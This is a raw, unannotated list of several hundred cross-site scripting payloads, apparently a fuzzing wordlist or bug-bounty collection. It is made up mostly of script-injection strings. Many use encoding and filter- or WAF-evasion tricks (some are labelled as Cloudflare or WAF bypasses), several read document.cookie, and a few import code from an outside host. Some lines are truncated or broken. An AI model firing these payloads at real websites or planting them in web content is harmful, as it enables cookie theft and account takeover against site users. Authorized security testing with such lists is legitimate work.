amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=
<script>prompt(document.domain)</script>
#<script>prompt(document.domain)</script>
-->""/></script><deTailS open x=">" ontoggle=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></
noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
<script>onerror=alert;throw 1337</script>
")%27--><sVG/onLoad=(confirm)(1)--!>"
")%27--><SvG/onLoad=(conf&#105;rm)(1)--!>"
")%27--><SvG/onLoaD=(co&#110;firm)(1)<!--"
")%27--><sVG/onload=(conf&#105;rm)(1)<!--"
")%27--><sVG/onload=(conf&#105;rm)(1)--!>"
")%27--><SvG/onLoaD=(co&#110;firm)(1)--!>"
alert(document.cookie)
'"><AHRef=\"AutoFocusOnFocus=top/**/?.document+cookie>
'); alert('Humal')
\\";alert('Humal');//
*/alert('HUMAL\n-HUMAL'); //
'); alert('Humal'); var x='
\\'); alert(\'Humal\');var x=\'
';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,
83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCod
e(88,83,83))//--&gt;&lt;/
SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/
SCRIPT&gt;
<img src='1' onerror/=alert(0) />
<object onafterscriptexecute=confirm(0)>
';alert(String.fromCharCode(88,83,83))//';
;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;aler
t(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//V></
SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
alert(String.fromCodePoint(88,83,83))
//”;alert(String.fromCharCode(88,83,83))
‘;alert(String.fromCharCode(88,83,83))//
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//
";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--
></
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;
alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//
&#45;&#45;></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
<img/src='1'/onerror=alert(0)>
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D
%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
<svg
onload
=
alert(1)
>
"><svg/onload=confirm(1)>"@x.y
+330011223344;phone-context=<script>alert(0)</script>
document.location='java\rscript:alert(1)'
eval('ale'+'rt(0)');
constructor.constructor("aler"+"t(3)")();
[].filter.constructor('ale'+'rt(4)')();
<img/src/onerror=alert(`ibro`)>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//
";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<svg onload=alert%26%230000000040"")>
%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%601%60%3E
;1'"><!--><K Data-Spy=scroll Data-Target=&lt;Svg/OnLoad&equals;confirm?.(1)%26gt;
%3E
;1/47/42/55/55/41/76/74Img/40Src/40OnError/75confirm/140/113/140/76
")%27--><sVG/onload=(co&#110;firm)(1)<!--"
#<img/src/onerror=alert(`ibro`)>
#'-alert(1)-'
#\"-alert(1)}//
>"'><script>alert(2);</script>
#*/alert(1)
'}alert(1);{'
({‘ \’(){alert(1)}})[` \`]()
>'"><script>alert(2);</script>
+alert(1)+
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
>'><script>alert(2);</script>
>'"><img src=x onerror=script(2);>
& lt;script&gt;alert(2);& lt;/script&gt;
& apos;><script>alert(2);</script>
!');script(2);//
$("script(2)")
[[constructor.constructor('alert(document.cookie)')()]]
['script'](2)
123')});alert(1);(()=>{('
&#x27;&lt;script&gt;alert(1)&lt;/script&gt;&#x27;
&#x27;javascript:alert(2)&#x27;
#x27;&lt;img src=1 onerror=alert(1)&gt;&#x27;
&#x27;&quot;&lt;img src=1 onerror=alert(1)&gt;&quot;&#x27;
&#x27;&quot;&gt;&lt;img src=x onerror=prompt(document['domain']);&gt;&#x27;
" /> <script>alert('XSS Testing");</script>
');alert(1)//
" accesskey='x' onclick='confirm`1`' //
<x/oncopy=alert()>x
a=8,b=confirm,c=window,c.onerror=b;throw-a
<?tag x="-->" test="<img src=x onerror=alert(1)//">
<java contentEditable='' autofocus=''
onfocus=location=tagName+innerHTML+location.hash>script:/*#*/alert(1)
new Function`a\l\ert\`1\``
?url=%26%2302java%26%23115cript:alert(document.domain)
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
</script><script>confirm(document.cookie)</script>
<sCriPt>confirm(documen.cookie)</ScRipt>
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
')}, 1000);alert("xss");//
1'"();<test><ScRiPt>window.alert("XSS_WAF_BYPASS")</ScRiPt>
1'"();<test><iframe onload="window.alert('XSS_WAF_BYPASS')"></iframe>
<body onload="window.alert('XSS_WAF_BYPASS')">
<link rel="stylesheet" href="#" onload="window.alert('XSS_WAF_BYPASS')">
1'"();<test><ScRiPt>alert("XSS_WAF_BYPASS")</ScRiPt>
"><img src=x onerror=prompt(document['domain']);>.asp
"><img src=x onerror=prompt(document['domain']);>.aspx
"><img src=x onerror=prompt(document['domain']);>.php
"><img src=x onerror=prompt(document['domain']);>.html
"><img src=x onerror=prompt(document['domain']);>.htm
"><svg onload=prompt(document.domain);>.asp
"><svg onload=prompt(document.domain);>.aspx
"><svg onload=prompt(document.domain);>.php
"><svg onload=prompt(document.domain);>.html
<!--><svg onload=alert(1)-->.asp
<!--><svg onload=alert(1)-->.aspx
<!--><svg onload=alert(1)-->.php
<!--><svg onload=alert(1)-->.html
"><img src=x onerror=prompt('document.domain');>.asp
"><img src=x onerror=prompt('document.domain');>.aspx
"><img src=x onerror=prompt('document.domain');>.php
"><img src=x onerror=prompt('document.domain');>.html
"><img src=x onerror=prompt('document.domain');>.htm
<script>alert(1)</script>.asp
<script>alert(1)</script>.aspx
<script>alert(1)</script>.php
<script>alert(1)</script>.html
<script>alert(1)</script>.htm
<ScRiPt>alert(1)</ScRiPt>
<s%00c%00r%00i%00p%00t>alert(1)</script>
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
<img src="x" onerror="alert(1)">
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
%3cscript%3ealert(1)%3c/script%3e
&#60;svg/onload=alert(1)&#62;
&#60;script&#62;alert(1)&#60;/script&#62;
--><svg onload=alert(1)>
aaaaa\”-confirm`1`//
\”-confirm`1`//
%3C%2Fscript%3E%3Cscript%3Econfirm%28document.domain%29%3C%2Fscript%3E
";}(document.writeln(decodeURI(location.hash))-"#<iframe
src=javascript:alert(document.domain)
javascript://%250Aalert(1)
mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E
<a href="javascript:alert(1)">a</a>
<iframe src="javascript:alert(1)"></iframe>
eval('alert(1)');
javascript:window/*Ata*/[%27loc%27%2b%27ati%27%2b%27on%27]%3d%27java%27%2b%27scr
%27%2b%27ipt:%27%2blocation/*#*/;alert(origin)
\u0061\u006c\u0065\u0072\u0074(1)
<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
'"><script>alert(2);</script>
"+self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])//
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
%3E'><script>alert(2);</script>
%22-[9].every(alert)-%22//
%22%3E'><script>alert(2);</script>
%E2%80%9C%3E%3CSvG%2Fonload%3Dalert%28document.domain%29%3E
%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D
%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
%27%3E'><script>alert(2);</script>
%22%27%3E'><script>alert(2);</script>
'> <script>alert(2);</script>
'>'><SCript>alert(2);</script>
"/><script>alert(1337);</script>
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
<iframe srcdoc='<script
src="data:text/javascript,alert(document.domain)"></script>'></iframe>
%27%3E%27%3E%22%3E%script%3Ealert(2);%3C/script%3E
'>👽💻🔥<script>alert(2);</script>
'>'+'><script>alert(2);</script>
&#62;'&gt;"<script>alert(2);</script>
'&#x3E;'>"><script>alert(2);</script>
<img src=x onerror=alert('from\u0020subcat\u0020title')>
"><img src=a onerror=alert(document.location)>
"><svg/onload=prompt('Supakiad-S. (m3ez)', document.domain)>
"><A%20%252F=""Href=%20JavaScript:k='%22',top[k+'lert']('XSS')">
'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'
'\u003E'\u0022><script>alert(2);</script>
'>'\n><script>alert(2);</script>
'&#x3E;'><script>alert(2);</script>
'>&lt;/b&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;b&gt;&lt;!--
'><!--"/><style>@import
'data:text/css;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKSk=';</style><b><!--
'>&lt;/b&gt;%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cb&gt;&lt;!--
'\u003e\'</b><script>alert(document.cookie)</script><b><!--'
'+ '</b><script>alert(document.cookie)</script><b><!--'
(function(){alert(document.cookie)})();
')})();alert(document.cookie);({}'
'><!--</b><script>alert(document.cookie)</script><b><!--'
"alert(document.cookie)['script'](2);"
'});alert(document.cookie);//'
'&lt;/b&gt;<script>alert(document.cookie)</script><b&gt;<!--
'><scr'+'ipt>alert(document.cookie)</scr'+'ipt><b><!--
');alert(document.cookie)();//
'> </b> <script> alert(document.cookie) </script> <b> <!--
' style="display:none"><script>alert(document.cookie)</script><b><!--
' + String.fromCharCode(41) + 'alert(document.cookie)' + String.fromCharCode(40) +
'//
'><b title="</b><script>alert(document.cookie)</script><b"><!--
`${String.fromCharCode(60)}/b$
{String.fromCharCode(62)}<script>alert(document.cookie)</script>$
{String.fromCharCode(60)}b${String.fromCharCode(62)}<!--`
'&#x29;&#x28;};alert(document.cookie);--&#x22; &lt;'
"><img src=x onerror=alert`1`;
"><img src=x onerror=alert('1');
`"><img src=x onerror=alert`1`;
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1);%3E
'>&#40;&#41;<script>alert(document.cookie)</script><b><!--'
'&lt;/b&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;b&gt;&lt;!--'
')};alert(document.cookie);//"
')};alert(document.cookie);--" /*'
'> <!-- </b> <script> alert(document.cookie) </script> <b> <!--'
"><img src=x onerror=alert('1");
"><img src=x onerror=alert&lsqb;1];
"><img src=x onfocus=alert(1);>
'<!--\x29\x28;}alert(document.cookie);//"-->'
' title="</b><script>alert(document.cookie)</script><b><!--">'
'%27%3E%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cb%3E%3C%21--'
'\u0029\u0028};alert(document.cookie);//"
"><svg/onload=alert(1);>
"><iframe onload=alert(1);>
"><audio onplay=alert(1);>
"><img src="javascript:alert(1);" />
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E
"><img src=x onerror=alert 1;
"><img src=x onerror=prompt(document.domain);<<
"><img src=x onerror=prompt(document['domain']);>
"><img src=x onerror=this.innerHTML=''><script>alert(document.domain)</script>">
"><img src=x onerror=eval('prompt(document.domain)')>
"><img src=x onerror=Function('prompt(document.domain)')()
"><img src=x id="img">
<script>document.getElementById('img').addEventListener('error', function()
{prompt(document.domain);})</script>
"><img src=x onerror=prompt(document.domain);>
"><img src=x><img src= onerror=prompt(document.domain);>
PHNjcmlwdD5pbWcgc3JjPXggb25lcnJvci5wcm9tb3RlKHRy
&quot;&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
&lt;&lt;img src=x onerror=prompt(document)&gt;&gt;;
"><img\ src=x\ onerror=prompt(document.domain);>
"><img src=x onerror="prompt(document.domain);">
"><img src=x onerror=prompt(document&#46;domain);>
"><img src=x onerror=prompt(document%2Edomain);>
"><img
src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEA
Ow==" onerror=prompt(document.domain);>
"><img src=x onerror=prompt(String.fromCharCode(100, 111, 99, 117, 109, 101, 110,
116, 46, 100, 111, 109, 97, 105, 110));>
"><img src=x onerror=prompt(unescape('document%2Edomain'));>
"><svg onload=prompt(document.domain);>
"><img src=x onerror=prompt(document.domain); title=x>
"><div style="background-image: url(x)" onerror=prompt(document.domain);>
"><script>var img=document.createElement('img');img.src='x';img.onerror=function()
{prompt(document.domain);};document.body.appendChild(img);</script>
"><div style="background-image: url('x');" onerror=prompt(document.domain);>
<scr'+'ipt>alert(1)</scr'+'ipt>
\<script\>alert(1)\<\/script\>
<script>alert\u00281\u0029</script>
%3Cscript%3Ealert(1)%3C/script%3E
"><IMG SRC=x ONERROR=prompt(document.domain);>
"><div src=x onerror=prompt(document.domain);>
"><img
src=data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAO
w== onerror=prompt(document.domain);>
"><div style="background-image: url(x);" onerror=prompt(document.domain);>
"><img src=/https/www.scribd.com/x onerror=prompt(document.domain);>
"><img src="x" onerror="prompt(document.domain);">
"><img src='x' onerror='prompt(document.domain);'>
"><img src=x onerror=(prompt(document.domain));>
"><img src=x onerror=prompt(document.domain);>
"><img src=x&#9;onerror=prompt(document.domain);>
"><img src=x onerror=prompt('document.domain');>
"><img src=x id=img>
<script>document.getElementById('img').addEventListener('error',function()
{prompt(document.domain);})</script>
"><img src=x style=content:'x' onerror=prompt(document.domain);>
"><img src=data:, onerror=prompt(document.domain);>
"><img src=x alt=x onerror=prompt(document.domain);>
%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E
%22%3E%3Cimg%09src%3Dx%09onerror%3Dprompt(document.domain);%3E
"><img src=x ONERROR=prompt(document.domain);>
"><img src=x onmouseover=prompt(\u0064ocument.domain);>
"><link rel="stylesheet" href="style.css"><img src=x
onerror=prompt(document.domain);>
"><svg><img src=x onerror=prompt(document.domain);></svg>
'--><img src=x onerror=prompt(document.domain);><!--
"><img/src/onerror=alert(`ibro`)>
"<div style="background-image: url(x)" onerror=prompt(document.domain);>
\"><img src=x onerror=prompt(document.domain);>
"><img src:x onerror=prompt(document.domain);>
"><img src=x\%28\%29\ onerror=prompt(document.domain);>
">&lt;img src=x onerror=prompt(document.domain);&gt;
"%3E<img src=x onerror=prompt(document.domain);%3E"
"><img src=x onerror=prompt(document.domain);String.fromCharCode(62);">
">\<img src=x onerror=prompt(document.domain);\>\;\>\<\>"
%0d%0a%0d%0a<script>alert(document.domain)</script>
>'>"><script>alert();</script>
>'>"><svg/onload=alert(document.domain)>
javascript:alert(1);/////
"><img src=x onerror='alert(document.domain)'>
'"/><img src= x onerror='alert(document.domain)'>
'"/><img src= x onerror=prompt(/xss/)>
<img src='test' onmouseover='alert(2)'>
/><script>window.alert('XSS Vulnerable');</script>
#<script>alert(document.domain)</script>
</style></script><script>alert("XSS")</script>
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41,
59)</script>
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%7
<ScRipt>ALeRt("hi");</sCRipT>
"};alert(23);a={"a":
#<><img src=1 onerror=alert(1)>
"></select><img%20src=1%20onerror=alert(1)>
{{$on.constructor('alert(1)')()}}
\"-alert(1)}//
eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCdYU1MgUE9DIGJ5IERFREknKTwvc2NyaXB
0PiJ9
><sVg%2Fonload%3Dalert%281%29+class%3Dikhsan>
q="><img/src/onerror=.1|alert`` class=d>
search?q=javascript:alert(document.domain)
#javascript:alert(document.domain)
<><img src=1 onerror=alert(1)>
<img src=1 onerror=print()>
%27x%27onclick=%27alert(1)
"><sVg%2fonload%3dalert%2ebind%28%29%281%29%20class%3dRahul-Dh>
“><img only src=1 onerror=alert()>
<svg/ONxss='0'/ONload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;
<img+src%3dOnXSS+OnError%3dalert('XSs-Cloudflare-bypass-By-Dedi')>
<Img Src=OnXSS OnError=prompt(document.cookie)>
</script><svg/pnload=prompt(1)>
<sCript>confirm()</sCript>
"><SVG
ONLOAD=&#97&#108&#101&#114&#116(&#x64&#x6f&#x63&#x75&#x6d&#x65&#x6e&#x74&#x2e&#x64&
#x6f&#x6d&#x61&#x69&#x6e)>
<img src=x onerror=prompt()>
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</
Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*$
{/*/;{/**/(import(/https:\\X55.is/.source))}//\76-->
javascript:var{a:onerror}={a:alert};throw%20document.domain
java%0d%0ascript%0d%0a:alert(document.domain);//
&lt;img src=x onerror=alert()>
#\'-alert(1)//
-alert(1)-&apos;
' onerror='alert("xss")'>
<img src="invalid-image" onerror="alert('XSS');">
#<img src="invalid-image" onerror="alert('XSS');">
<img src=x onerror="prompt(1)">aaaaaaaaaaaa
/cpanelwebcall/<img src=x onerror="prompt(1)">aaaaaaaaaaaa
</script><svg/onload=alert(0)>
"><body/oNpagEshoW=(confirm)(document.domain)>
"<IMG DYNSRC=\"javascript:alert('XSS');\">"
[email protected]\u003C/script\u003E\u003Cscript\u003Ealert(document.domain)//
test<i>test</i><a onmouseover="alert(document.cookie)">
//j\\javascript:alert(document.domain)
<p><img/src/onerror=alert(`ibro`)></p>
('+'alert(1)+')();
.alert(1);
'></script><svg/onload=alert(document.cookie)>
//j%5c%5cjavascript%3aalert(document.domain)
javascript:(alert('XSS Success!'))()
#javascript:(alert('XSS Success!'))()
#"><svg onload=alert(1)>
%3Cimg%20src%3D1%20onerror%3Dalert%281%29%3E
嘼 img src=1 onerror=alert(1)嘾
嘾嘾<script>alert(2);</script>
嘼 svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
嘼"><svg onload=prompt(document.domain);>
嘍嘊嘍嘊嘍嘊嘼 script 嘾 alert(1);嘼/script 嘾
"><u>XSS</u><marquee+onstart='alert(document.cookie)'>XSS
{{window['eval'](window['atob'](window['decodeURIComponent']
('Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy')))}}
data:text/
html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy
data:text/
html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ=
=
///%01javascript:alert(document.cookie)/
javascript:alert(document.domain);
xss"</sc"ript><sv"g/onloa"d=aler"t"(document.doma"in)>
0xd3adc0de<ScRiPt>alert('XSS Success!')</sCripT>
0xd3adc0de&lt;ScRiPt&gt;alert('XSS Success!')&lt;/sCripT&gt;
</b><script>alert(document.cookie)</script><b><!--
</title><script>alert(document.domain)</script>
ryp3i"accesskey="x"onclick="alert(1)"//opk15
#<ScRiPt>alert(1)</ScRiPt>#
"'><svg/onload=confirm(666)>
#"'><svg/onload=confirm(666)>
'x'%20onclick='confirm`1`'
'confirm(document.domain)'>
#'confirm(document.domain)'>
#</script><script>alert(1)</script>
;</script><embed/test='asdf'/sr%00c='/'>
${alert(1)}
d1bvs%3c%2fscript%3e%3cscript%3ealert(`XSS`)%3c%2fscript%3ec579g
d1bvs</script><script>alert(`XSS`)</script>c579g
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
https://me6.com/aem/xss2.svg
<Img Src=OnXSS OnError=confirm(1)>
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
<svg></p><style><g title="</style><img src onerror=alert(document.domain)>">
"/>"/><img src=xss onerror=alert(2)>
/><svg src=x onload=confirm(document.domain);>
</h1><script>alert(1)</script><h1>
</script><body/onload=alert(m3ez)>
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
"onmouseover="alert(document.cookie)"><!--
<script>alert(1234)</script>
<script>prompt(1234)</script>
#/<script>alert(1234)</script>
<IMG+LOWSRC="javascript:alert(1);">
<meta style="xss:expression(open(alert(1)))" />
<img+<iframe ="1" onerror="alert(1)">
<base+href="javascript:alert(1);//">
<bgsound+src="javascript:alert(1);">
<object+data="javascript:alert(0)">
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>1
%3E%3Cbody%20onload=javascript:alert(1)%3E
'">><marquee><h1>1</h1></marquee>
</br style=a:expression(alert(1))>
<font style='color:expression(alert(1))'>
<embed src="data:image/svg+xml;>
"/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
<object><param name="src" value="javascript:alert(0)"></param></object>
<isindex action=javascript:alert(1) type=image>
<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>
'%26%26'javascript:alert%25281%2529//
<scr<script>ipt>prompt(document.cookie)</scr</script>ipt>
12&<script>alert(123)</script>=123
<img/src="xss.png"alt="xss">
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>
<scr<script>ipt>alert('XSS')</scr</script>ipt>
foo%00<script>alert(document.cookie)</script>
x"><svg%0Donload="window['alert'](document.cookie)">
x'><svg%0Donload='window["alert"](document.cookie)'>
x"><svg%0Donload="window['alert'](document['cookie'])">
x"><svg%0Donload="window['alert']((document)['cookie'])">
x\"><svg%0Donload=\"window[\'alert\']((document)[\'cookie\'])\">
x"><svg%0Donload=`window['alert']((document)['cookie'])`>
x"><svg%0Donload=`window["alert"](((document)['cookie']))`>
"><<script>alert(document.cookie);//<</script>
><s"%2b"cript>alert(document.cookie)</s"%2B"cript>
#%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
<script>alert(['X','S','S'].join(''))</script>
3Cscript%3Ealert(1)%3C%2Fscript%3E
%253Cscript%253Ealert(1)%253C/script%253E
#%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
%BCscript%BEalert(%A21%A2)%BC/script%BE
";(a=alert,b=1,a(b))
"<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >"
x"><svg%0Donload="window['alert'](document['cookie'])"
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<object+data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a>
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
<a+href="javas&#99;ript&#35;alert(1);">
<IMG+SRC=j&#X41vascript:alert(1)>
<IMG+SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&
#101;&#114;&#116;&#40;&#39;&#88;&#39;&#41;>
<IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#
0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#00
00039&#0000088&#0000039&#0000041>
%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript
%u003e
+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
<INPUT+TYPE="checkbox"+onDblClick=confirm(XSS)>
alert(String.fromCharCode(88))</SCRIPT>
&lt;script&gt;prompt(&apos;1&apos;)&lt;/script&gt;
&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28
;&#x27;&#x78;&#x73;&#x73;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x7
4;&#x3e;
&#x60;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;&#x97;&#x108;&#x101;&#x114;&#x
116;&#x40;&#x39;&#x120;&#x115;&#x115;&#x39;&#x41;&#x60;&#x47;&#x115;&#x99;&#x114;&#
x105;&#x112;&#x116;&#x62;
=<img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26
%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>
"+style%3d"x%3aexpression(alert(1))+
\";alert(1);//
#\";alert(1);//
<img src="x:%90" title="onerror=alert(1)//">
"+onkeypress="prompt(23)"+
"+onfocus="prompt(1)"+
#alert(document['cookie'])
with(document)alert(cookie)
";location=location.hash)//#0={};alert(0)
";alert(String.fromCharCode(88,83,83))
"+onDblClick=prompt(123)"+
"+onError=prompt(123)"+
">\u003Cimg src=x onerror=prompt(document.domain);\u003E"
">\3Cimg src=x onerror=prompt(document.domain);\3E"
PHNjcmlwdD5pbWcgc3JjPXggb25lcnJvci5wcm9tb3RlKHRyYW5zZm9ybS5kb21haW4pOy8+
">&#x3C;img src=x onerror=prompt(document.domain);&#x3E;"
">\<img src=x onerror=prompt(document.domain);\>"
">\74img src=x onerror=prompt(document.domain);\76"
">&lt;img src=x onerror=prompt(document.domain);&gt;()
"><img src=x onerror=prompt(document.domain);>()\
"%3E<img src=x onerror=prompt(document.domain);%3E()%3C"
"><img src=x onerror=prompt(document.domain);String.fromCharCode(62)();"
">\u003Cimg src=x onerror=prompt(document.domain);\u003E()("
">\3Cimg src=x onerror=prompt(document.domain);\3E()("
PHNjcmlwdD5pbWcgc3JjPXggb25lcnJvci5wcm9tb3RlKHRyYW5zZm9ybS5kb21haW4pOy8oKQ==
">&#x3C;img src=x onerror=prompt(document.domain);&#x3E;()("
">\<img src=x onerror=prompt(document.domain);\>()\"
">\74img src=x onerror=prompt(document.domain);\76()("
"><img src=x onerror=prompt(document.domain);&#59;&#60;&#62;
"><img src=x onerror=prompt(document.domain);\;\<\>
#<sc&#114;ipt>alert(1)<&#47;sc&#114;ipt>
#javasc&#114;ipt:alert(2);
&quot;&gt;&lt;svg onload=alert(1)&gt;
";eval(unescape(location))//#%0Aprompt(0)
%'});%0aalert(1);%20//
%27});%0aalert(1);%20//
'"><A HRef=\" AutoFocus OnFocus=top/**/?. >
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
%27"><Img Src=OnXSS OnError=alert(1)>
%27"><A%20HRef=\"%20AutoFocus%20OnFocus=top/**/?. >
%27/onerror=alert(1)/%27
/confirm?.(1)/
<img+only=1+src=x+onerror=confirm(1)>
">K=%27><Svg /OnLoad=(confirm)(1)>
%3Cscript%3Evar%20q=`%22`;alert(document.cookie);%3C/script%3E
<meter%20value="2"%20min="0"%20max="10"%20onmouseover="alert(%27XSS%27)">2%20out
%20of%2010</meter>
<svg/onload=setInterval(%27al\x65rt(1)%27,5000)>
<img%20src=x%20onerror=alert%281%29>
<script><!--\uFEFF--></script><script>alert(%27BOM%20Injection%27)</script>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open
ontoggle="prompt(document.cookie);">
1%27%22%3E%3CImg+Src%3DOnXSS+OnError%3Dalert%28document.cookie%29%3E
1%27"><Img+Src%3DOnXSS+OnError%3Dalert%28document.cookie%29>
</img+src=x%20oNlY=1%20oNerror=alert(document.cookie)>//
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`//>
--><K:script xmlns:K="http://www.w3.org/1999/xhtml">confirm?.(1)</K:script>
;1<%252FScript%252F><Img%252FSrc%252FOnError=confirm%253F%252E(1)>
confirm?.(1)
;1%2522--%253E%253CSvg%2520O%256ELoad%253Dconfirm%25281%2529%253E/c
;1'-confirm`K`-'
{{$new.constructor('(confirm)(1)')()}}
%27"><Img%0ASrc%0A=OnXSS%0AOnError%0A=alert(1)>
'"<%00!--%00><%00Img/Src/On%00Error=(conf%00irm)(1)>
1'"<�!--�><�Img/Src/On�Error=(conf�irm)(1)>
<img//////src=x oNlY=1 oNerror=alert(document.cookie)(import(/https:\\X55.is?
1=18369/.source))//>
")%27--><SvG/onload=(co&#110;firm)(1)<!--"
")%27--><SvG/onload=(co&#110;firm)(1)--!>"
")%27--><SvG/onLoad=(confirm)(1)--!>"
")%27--><SvG/onLoAd=(confirm)(1)<!--"
")%27--><sVG/onLoaD=(conf&#105;rm)(1)<!--"
")%27--><sVG/onLoaD=(confi&#x72;m)(1)<!--"
<IMG+SRC="jav&#x0A;ascript:alert(1);">
<IMG+SRC="jav#x0D;ascript:alert(1);">
"jav&#x09;ascript:alert(1);">
#"jav&#x09;ascript:alert(1);">
%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E
<script%00>alert(1)</script%00>
<scr%00ipt>prompt(1)</sc%00ript>
%3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E
%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E
<*script>prompt(123)<*/script>
<script%20TEST>alert(1)</script%20TESTTEST>
<<SCRIPT>alert(1);//<</SCRIPT>
<script>a\u006cert(1);</script>
